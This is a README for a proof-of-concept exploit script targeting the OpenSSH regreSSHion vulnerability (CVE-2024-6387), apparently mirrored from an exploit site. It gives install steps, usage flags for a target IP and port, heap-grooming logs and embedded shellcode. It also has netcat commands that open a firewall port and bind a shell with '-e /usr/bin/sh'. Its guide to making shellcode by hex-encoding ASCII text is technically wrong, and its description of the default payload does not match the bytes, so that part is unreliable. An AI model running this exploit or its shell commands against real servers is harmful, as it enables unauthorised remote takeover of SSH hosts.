## https://sploitus.com/exploit?id=EB13CBD6-BC93-5F14-A210-AC0B5A1D8572
# CVE-2024-6387 regreSSHion
*Proof of concept python script for regreSSHion exploit. Version 0.2.1 build POC*
![regreSSHion-green-banner](https://github.com/user-attachments/assets/13fdb689-42e9-4102-8f79-766ff23d20c6)
# Installation
```
git clone https://github.com/l-urk/CVE-2024-6387.git
```
```
cd CVE-2024-6387
```
```
pip3 install -r requirements.txt
```
```
python3 regreSSHion.py -h
```
# Usage
```
๐ CVE-2024-6387 regreSSHion remote code execution vulnerability exploit script
usage: regreSSHion.py [-h] -i IP -p PORT [-t] [-c] [-d] [-r] [-x] [-y] [-z]
๐ CVE-2024-6387 regreSSHion remote code execution vulnerability exploit script
options:
-h, --help show this help message and exit
-i IP, --ip IP target SSH server IPv4 ( format: -i 0.0.0.0 )
-p PORT, --port PORT target SSH server port number ( format: -p 22 )
-t, --time ENABLE TIME displayed on all log output ( format: -t )
-c, --clear CLEAR SCREEN before running the exploit ( format: -c )
-d, --debug enable see the DEBUG LOGS output on run ( format: -d )
-r, --repeat enable to REPEAT EXPLOIT until RCE wins ( format: -r )
-x, --skipssh enable this to SKIP SSH HANDSHAKES ( format: -x )
-y, --skipheap enable this to SKIP HEAP and parse ( format: -y )
-z, --skipfinal enable this to SKIP FINAL ID CHECK ( format: -z )
๐ Affected OpenSSH Versions: 1.2.2p1 ~ 4.4 and 8.5p1 ~ 9.8
๐ contact: github.com/l-urk - x.com/l_urkk
```
To use the script, start python3 with regreSSHion.py
- Set the ip to the vulnerable SSH server IPv4 address
- Set the port to the vulnerable SSH server port number
```
python3 regreSSHion.py --ip 127.0.0.1 --port 22
```
```
2024-08-03 22:42:55,944 - INFOS - Attempting to connect to 127.0.0.1:22 (attempt 1)
2024-08-03 22:42:55,945 - INFOS - Connection established
2024-08-03 22:42:55,945 - INFOS - Performing SSH handshake...
2024-08-03 22:43:05,014 - INFOS - Received KEX_INIT (5 bytes)
2024-08-03 22:43:05,015 - INFOS - SSH handshake successful.
2024-08-03 22:43:05,015 - INFOS - Preparing heap...
2024-08-03 22:43:05,015 - INFOS - Sent tcache chunk 1
2024-08-03 22:43:05,015 - INFOS - Sent tcache chunk 2
2024-08-03 22:43:05,015 - INFOS - Sent tcache chunk 3
2024-08-03 22:43:05,015 - INFOS - Sent tcache chunk 4
```
Let's say you make it all the way here in the script...
```
2024-08-03 22:46:45,858 - INFOS - Sent fake file structure 3
2024-08-03 22:46:45,858 - INFOS - Sent fake file structure 4
2024-08-03 22:46:45,858 - INFOS - Sent fake file structure 5
2024-08-03 22:46:45,858 - INFOS - Sent large string
2024-08-03 22:46:45,858 - INFOS - Heap preparation complete.
2024-08-03 22:47:05,879 - INFOS - Estimated parsing time: 0.000056 seconds
2024-08-03 22:47:05,880 - INFOS - Final packet sent successfully.
2024-08-03 22:47:05,880 - INFOS - Verifying exploit success.
2024-08-03 22:47:15,890 - WARN! - No response received for verification.
```
If it says exploit verification success you have successfully delivered and executed your payload.
The script will try a few times to succeed.
I would suggest trying this on your own vulnerable SSH server until you get a feel for getting the success message.
```
2024-08-03 22:47:15,891 - ERROR - Exploitation failed.
```
Debug mode
- With debug mode enabled you will get a more verbose output, this will show you the received SSH version string, packet length information, and some other things, pretty much everything that's happening that could possibly be logged.
```
python3 regreSSHion.py --ip 127.0.0.1 --port 22 --debug
```
Example Output:
```
2024-08-03 22:44:53,962 - DEBUG - Logging is set to DEBUG level
2024-08-03 22:44:53,962 - INFOS - Attempting to connect to 127.0.0.1:22 (attempt 1)
2024-08-03 22:44:53,963 - INFOS - Connection established
2024-08-03 22:44:53,963 - INFOS - Performing SSH handshake...
2024-08-03 22:44:53,963 - DEBUG - Sent SSH version string.
2024-08-03 22:44:53,963 - DEBUG - Waiting to receive SSH version string
2024-08-03 22:45:03,256 - DEBUG - Received SSH version string: SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1
2024-08-03 22:45:04,373 - INFOS - Received KEX_INIT (4 bytes)
2024-08-03 22:45:04,373 - INFOS - SSH handshake successful.
2024-08-03 22:45:04,373 - INFOS - Preparing heap...
```
# shellcode payload
The default shellcode uses ufw to open incoming port 9999 and starts a nc listening shell on port 9999
```
shellcode = b"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x66\xb3\x01\x51\x53\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\x31\xdb\xb3\x02\x68\x7f\x00\x00\x01\x66\x68\x27\x0f\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x6a\x01\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x05\x56\x56\x89\xe1\xcd\x80\x89\xc3\x31\xc9\xb0\x3f\xcd\x80\xb0\x3f\xb1\x01\xcd\x80\xb0\x3f\xb1\x02\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
```
# shellcode payload creation
You can make your own shellcode payload by using an ascii to hex editor, and manually converting it to shellcode. I use this ascii-to-hex website here: https://www.rapidtables.com/convert/number/ascii-to-hex.html
- Input your desired text for the shellcode.
- Use the settings "User defined" and "\x" in the input box.
- Replace all capital X's with lowecase x's
- Use notepad or another character replacement capable program.
- Move the last \x from the end to the start of the hex string.
- Add quotes to both ends for interpretation by the shell.
# shellcode payload examples
hello world
```
hello world
```
```
"\x68\x65\x6C\x6C\x6F\x20\x77\x6F\x72\x6C\x64"
```
printf hello world
```
printf hello world
```
```
"\x70\x72\x69\x6E\x74\x66\x20\x68\x65\x6C\x6C\x6F\x20\x77\x6F\x72\x6C\x64"
```
make test file
```
test > test
```
```
"\x74\x65\x73\x74\x20\x3E\x20\x74\x65\x73\x74"
```
Allow incoming connections on port 9999 & open a nc shell on port 9999
```
ufw allow 9999 && /usr/bin/nc -lvp 9999 -e /usr/bin/sh
```
```
"\x75\x66\x77\x20\x61\x6C\x6C\x6F\x77\x20\x39\x39\x39\x39\x20\x26\x26\x20\x2F\x75\x73\x72\x2F\x62\x69\x6E\x2F\x6E\x63\x20\x2D\x6C\x76\x70\x20\x39\x39\x39\x39\x20\x2D\x65\x20\x2F\x75\x73\x72\x2F\x62\x69\x6E\x2F\x73\x68"
```
# send_socket.py
If you want to test out the exection of a shellcode payload you can use the send_socket.py script.
Usage:
```
usage: send_socket.py [-h] [-i IP] [-p PORT] [-s SHELLCODE]
send shellcode to a target socket (ip and port)
options:
-h, --help show this help message and exit
-i IP, --ip IP target ip address (default: 127.0.0.1)
-p PORT, --port PORT target tcp socket port (default: 1111)
-s SHELLCODE, --shellcode SHELLCODE
shellcode hex to send in format: \x00\x00\x00\...etc (default: F13)
```
**Sender:**
```
python3 send_socket.py -i 127.0.0.1 -p 1111
```
**Listener:**
- raw text interpretation
```
nc -lvp 1111
```
- shell execution
```
nc -lvp 1111 -e /usr/bin/bash
```